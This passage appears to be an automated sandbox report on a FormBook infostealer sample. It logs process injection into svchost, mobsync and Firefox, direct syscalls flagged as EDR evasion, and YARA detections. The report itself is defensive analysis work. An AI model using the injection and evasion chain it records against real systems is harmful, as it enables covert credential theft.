                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340A5B mov eax, dword ptr fs:[00000030h]9_2_03340A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340A5B mov eax, dword ptr fs:[00000030h]9_2_03340A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338AA0 mov eax, dword ptr fs:[00000030h]9_2_03338AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338AA0 mov eax, dword ptr fs:[00000030h]9_2_03338AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03386AA4 mov eax, dword ptr fs:[00000030h]9_2_03386AA4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368A90 mov edx, dword ptr fs:[00000030h]9_2_03368A90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h]9_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404A80 mov eax, dword ptr fs:[00000030h]9_2_03404A80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336AAEE mov eax, dword ptr fs:[00000030h]9_2_0336AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336AAEE mov eax, dword ptr fs:[00000030h]9_2_0336AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330AD0 mov eax, dword ptr fs:[00000030h]9_2_03330AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03364AD0 mov eax, dword ptr fs:[00000030h]9_2_03364AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03364AD0 mov eax, dword ptr fs:[00000030h]9_2_03364AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03386ACC mov eax, dword ptr fs:[00000030h]9_2_03386ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03386ACC mov eax, dword ptr fs:[00000030h]9_2_03386ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03386ACC mov eax, dword ptr fs:[00000030h]9_2_03386ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404940 mov eax, dword ptr fs:[00000030h]9_2_03404940
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B892A mov eax, dword ptr fs:[00000030h]9_2_033B892A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C892B mov eax, dword ptr fs:[00000030h]9_2_033C892B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BC912 mov eax, dword ptr fs:[00000030h]9_2_033BC912
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328918 mov eax, dword ptr fs:[00000030h]9_2_03328918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328918 mov eax, dword ptr fs:[00000030h]9_2_03328918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE908 mov eax, dword ptr fs:[00000030h]9_2_033AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE908 mov eax, dword ptr fs:[00000030h]9_2_033AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4978 mov eax, dword ptr fs:[00000030h]9_2_033D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4978 mov eax, dword ptr fs:[00000030h]9_2_033D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BC97C mov eax, dword ptr fs:[00000030h]9_2_033BC97C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03356962 mov eax, dword ptr fs:[00000030h]9_2_03356962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03356962 mov eax, dword ptr fs:[00000030h]9_2_03356962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03356962 mov eax, dword ptr fs:[00000030h]9_2_03356962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337096E mov eax, dword ptr fs:[00000030h]9_2_0337096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337096E mov edx, dword ptr fs:[00000030h]9_2_0337096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337096E mov eax, dword ptr fs:[00000030h]9_2_0337096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0946 mov eax, dword ptr fs:[00000030h]9_2_033B0946
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B89B3 mov esi, dword ptr fs:[00000030h]9_2_033B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B89B3 mov eax, dword ptr fs:[00000030h]9_2_033B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B89B3 mov eax, dword ptr fs:[00000030h]9_2_033B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h]9_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033309AD mov eax, dword ptr fs:[00000030h]9_2_033309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033309AD mov eax, dword ptr fs:[00000030h]9_2_033309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033629F9 mov eax, dword ptr fs:[00000030h]9_2_033629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033629F9 mov eax, dword ptr fs:[00000030h]9_2_033629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BE9E0 mov eax, dword ptr fs:[00000030h]9_2_033BE9E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h]9_2_0333A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033649D0 mov eax, dword ptr fs:[00000030h]9_2_033649D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FA9D3 mov eax, dword ptr fs:[00000030h]9_2_033FA9D3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C69C0 mov eax, dword ptr fs:[00000030h]9_2_033C69C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov eax, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov eax, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov eax, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov ecx, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov eax, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352835 mov eax, dword ptr fs:[00000030h]9_2_03352835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A830 mov eax, dword ptr fs:[00000030h]9_2_0336A830
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D483A mov eax, dword ptr fs:[00000030h]9_2_033D483A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C480A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_00C480A9
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00C1A155
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1A124 SetUnhandledExceptionFilter,5_2_00C1A124
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011A124 SetUnhandledExceptionFilter,7_2_0011A124
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0011A155

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtClose: Direct from: 0x77762B6C
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtSetInformationThread: Direct from: 0x77762ECCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 1832Jump to behavior
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28AC008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C80008Jump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C487B1 LogonUserW,5_2_00C487B1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BF3B3A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BF48D7
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C54C53 mouse_event,5_2_00C54C53
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C47CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C47CAF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C4874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00C4874B
                    Source: 25Lz840Dmh.exe, fricandeaus.exe.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: 25Lz840Dmh.exe, fricandeaus.exe, LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1862B cpuid 5_2_00C1862B
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C24E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00C24E87
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C31E06 GetUserNameW,5_2_00C31E06
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C23F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00C23F3A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BF49A0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
